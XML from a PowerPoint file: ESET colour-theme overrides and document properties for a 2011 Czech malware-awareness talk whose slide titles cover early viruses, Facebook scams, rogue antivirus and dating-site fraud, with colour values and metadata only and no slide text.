<file path=ppt/theme/themeOverride6.xml><?xml version="1.0" encoding="utf-8"?>
<a:themeOverride xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <a:clrScheme name="ESET">
    <a:dk1>
      <a:srgbClr val="00646C"/>
    </a:dk1>
    <a:lt1>
      <a:srgbClr val="FFFFFF"/>
    </a:lt1>
    <a:dk2>
      <a:srgbClr val="000000"/>
    </a:dk2>
    <a:lt2>
      <a:srgbClr val="B6C0C6"/>
    </a:lt2>
    <a:accent1>
      <a:srgbClr val="68CF9B"/>
    </a:accent1>
    <a:accent2>
      <a:srgbClr val="ABD38C"/>
    </a:accent2>
    <a:accent3>
      <a:srgbClr val="E9D35E"/>
    </a:accent3>
    <a:accent4>
      <a:srgbClr val="ED9F75"/>
    </a:accent4>
    <a:accent5>
      <a:srgbClr val="F15D5A"/>
    </a:accent5>
    <a:accent6>
      <a:srgbClr val="8590E1"/>
    </a:accent6>
    <a:hlink>
      <a:srgbClr val="2290D5"/>
    </a:hlink>
    <a:folHlink>
      <a:srgbClr val="2290D5"/>
    </a:folHlink>
  </a:clrScheme>
</a:themeOverride>
</file>

<file path=ppt/theme/themeOverride7.xml><?xml version="1.0" encoding="utf-8"?>
<a:themeOverride xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <a:clrScheme name="ESET">
    <a:dk1>
      <a:srgbClr val="00646C"/>
    </a:dk1>
    <a:lt1>
      <a:srgbClr val="FFFFFF"/>
    </a:lt1>
    <a:dk2>
      <a:srgbClr val="000000"/>
    </a:dk2>
    <a:lt2>
      <a:srgbClr val="B6C0C6"/>
    </a:lt2>
    <a:accent1>
      <a:srgbClr val="68CF9B"/>
    </a:accent1>
    <a:accent2>
      <a:srgbClr val="ABD38C"/>
    </a:accent2>
    <a:accent3>
      <a:srgbClr val="E9D35E"/>
    </a:accent3>
    <a:accent4>
      <a:srgbClr val="ED9F75"/>
    </a:accent4>
    <a:accent5>
      <a:srgbClr val="F15D5A"/>
    </a:accent5>
    <a:accent6>
      <a:srgbClr val="8590E1"/>
    </a:accent6>
    <a:hlink>
      <a:srgbClr val="2290D5"/>
    </a:hlink>
    <a:folHlink>
      <a:srgbClr val="2290D5"/>
    </a:folHlink>
  </a:clrScheme>
</a:themeOverride>
</file>

<file path=ppt/theme/themeOverride8.xml><?xml version="1.0" encoding="utf-8"?>
<a:themeOverride xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <a:clrScheme name="ESET">
    <a:dk1>
      <a:srgbClr val="00646C"/>
    </a:dk1>
    <a:lt1>
      <a:srgbClr val="FFFFFF"/>
    </a:lt1>
    <a:dk2>
      <a:srgbClr val="000000"/>
    </a:dk2>
    <a:lt2>
      <a:srgbClr val="B6C0C6"/>
    </a:lt2>
    <a:accent1>
      <a:srgbClr val="68CF9B"/>
    </a:accent1>
    <a:accent2>
      <a:srgbClr val="ABD38C"/>
    </a:accent2>
    <a:accent3>
      <a:srgbClr val="E9D35E"/>
    </a:accent3>
    <a:accent4>
      <a:srgbClr val="ED9F75"/>
    </a:accent4>
    <a:accent5>
      <a:srgbClr val="F15D5A"/>
    </a:accent5>
    <a:accent6>
      <a:srgbClr val="8590E1"/>
    </a:accent6>
    <a:hlink>
      <a:srgbClr val="2290D5"/>
    </a:hlink>
    <a:folHlink>
      <a:srgbClr val="2290D5"/>
    </a:folHlink>
  </a:clrScheme>
</a:themeOverride>
</file>

<file path=ppt/theme/themeOverride9.xml><?xml version="1.0" encoding="utf-8"?>
<a:themeOverride xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <a:clrScheme name="ESET">
    <a:dk1>
      <a:srgbClr val="00646C"/>
    </a:dk1>
    <a:lt1>
      <a:srgbClr val="FFFFFF"/>
    </a:lt1>
    <a:dk2>
      <a:srgbClr val="000000"/>
    </a:dk2>
    <a:lt2>
      <a:srgbClr val="B6C0C6"/>
    </a:lt2>
    <a:accent1>
      <a:srgbClr val="68CF9B"/>
    </a:accent1>
    <a:accent2>
      <a:srgbClr val="ABD38C"/>
    </a:accent2>
    <a:accent3>
      <a:srgbClr val="E9D35E"/>
    </a:accent3>
    <a:accent4>
      <a:srgbClr val="ED9F75"/>
    </a:accent4>
    <a:accent5>
      <a:srgbClr val="F15D5A"/>
    </a:accent5>
    <a:accent6>
      <a:srgbClr val="8590E1"/>
    </a:accent6>
    <a:hlink>
      <a:srgbClr val="2290D5"/>
    </a:hlink>
    <a:folHlink>
      <a:srgbClr val="2290D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Eset-PowerPointTheme-v2009.1EN</Template>
  <TotalTime>1780</TotalTime>
  <Words>726</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Předvádění na obrazovce (4:3)</PresentationFormat>
  <Paragraphs>186</Paragraphs>
  <Slides>57</Slides>
  <Notes>51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57</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="62" baseType="lpstr">
      <vt:lpstr>Eset-Theme-v2009.1EN</vt:lpstr>
      <vt:lpstr>Content green</vt:lpstr>
      <vt:lpstr>1_Content default</vt:lpstr>
      <vt:lpstr>Title &amp; Section slides</vt:lpstr>
      <vt:lpstr>Other</vt:lpstr>
      <vt:lpstr>Havěť 2011  Igor Hák, hak@eset.cz </vt:lpstr>
      <vt:lpstr>Obsah</vt:lpstr>
      <vt:lpstr>1986, virus Brain</vt:lpstr>
      <vt:lpstr>1986, virus Brain</vt:lpstr>
      <vt:lpstr>1986, virus Brain</vt:lpstr>
      <vt:lpstr>1986, virus Brain</vt:lpstr>
      <vt:lpstr>1986, virus Brain</vt:lpstr>
      <vt:lpstr>1986 - dnešek</vt:lpstr>
      <vt:lpstr>Z jiného soudku</vt:lpstr>
      <vt:lpstr>Facebook, 2006</vt:lpstr>
      <vt:lpstr>Facebook, 2007</vt:lpstr>
      <vt:lpstr>Prezentace aplikace PowerPoint</vt:lpstr>
      <vt:lpstr>Prezentace aplikace PowerPoint</vt:lpstr>
      <vt:lpstr>Prezentace aplikace PowerPoint</vt:lpstr>
      <vt:lpstr>Facebook</vt:lpstr>
      <vt:lpstr>Facebook</vt:lpstr>
      <vt:lpstr>Prezentace aplikace PowerPoint</vt:lpstr>
      <vt:lpstr>Prezentace aplikace PowerPoint</vt:lpstr>
      <vt:lpstr>Z jiného soudku</vt:lpstr>
      <vt:lpstr>Prezentace aplikace PowerPoint</vt:lpstr>
      <vt:lpstr>Prezentace aplikace PowerPoint</vt:lpstr>
      <vt:lpstr>Facebook</vt:lpstr>
      <vt:lpstr>Facebook</vt:lpstr>
      <vt:lpstr>Facebook</vt:lpstr>
      <vt:lpstr>Facebook</vt:lpstr>
      <vt:lpstr>Facebook</vt:lpstr>
      <vt:lpstr>Facebook</vt:lpstr>
      <vt:lpstr>Facebook</vt:lpstr>
      <vt:lpstr>Facebook</vt:lpstr>
      <vt:lpstr>Facebook</vt:lpstr>
      <vt:lpstr>Facebook</vt:lpstr>
      <vt:lpstr>Facebook</vt:lpstr>
      <vt:lpstr>Prezentace aplikace PowerPoint</vt:lpstr>
      <vt:lpstr>Facebook</vt:lpstr>
      <vt:lpstr>Facebook</vt:lpstr>
      <vt:lpstr>Facebook</vt:lpstr>
      <vt:lpstr>Facebook</vt:lpstr>
      <vt:lpstr>Facebook</vt:lpstr>
      <vt:lpstr>Facebook</vt:lpstr>
      <vt:lpstr>SEO Poisoning</vt:lpstr>
      <vt:lpstr>Prezentace aplikace PowerPoint</vt:lpstr>
      <vt:lpstr>Rogue antivirus / antispyware</vt:lpstr>
      <vt:lpstr>Prezentace aplikace PowerPoint</vt:lpstr>
      <vt:lpstr>Prezentace aplikace PowerPoint</vt:lpstr>
      <vt:lpstr>Prezentace aplikace PowerPoint</vt:lpstr>
      <vt:lpstr>Havěť na LEGITIMNÍCH stránkách</vt:lpstr>
      <vt:lpstr>Havěť na LEGITIMNÍCH stránkách</vt:lpstr>
      <vt:lpstr>Prezentace aplikace PowerPoint</vt:lpstr>
      <vt:lpstr>Havěť na LEGITIMNÍCH stránkách</vt:lpstr>
      <vt:lpstr>Havěť na LEGITIMNÍCH stránkách</vt:lpstr>
      <vt:lpstr>Havěť na LEGITIMNÍCH stránkách</vt:lpstr>
      <vt:lpstr>Havěť na LEGITIMNÍCH stránkách</vt:lpstr>
      <vt:lpstr>Havěť na LEGITIMNÍCH stránkách</vt:lpstr>
      <vt:lpstr>Trojan Win32/PSW.LdPinch.NCB</vt:lpstr>
      <vt:lpstr>Podvody na seznamkách</vt:lpstr>
      <vt:lpstr>Podvody na seznamkách</vt:lpstr>
      <vt:lpstr>Děkuji za pozornost!  Igor Hák, hak@eset.cz www.eset.cz</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>igi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igi</dc:creator>
  <cp:lastModifiedBy>igi</cp:lastModifiedBy>
  <cp:revision>361</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2008-09-20T14:29:38Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-11-09T08:56:32Z</dcterms:modified>
</cp:coreProperties>
</file>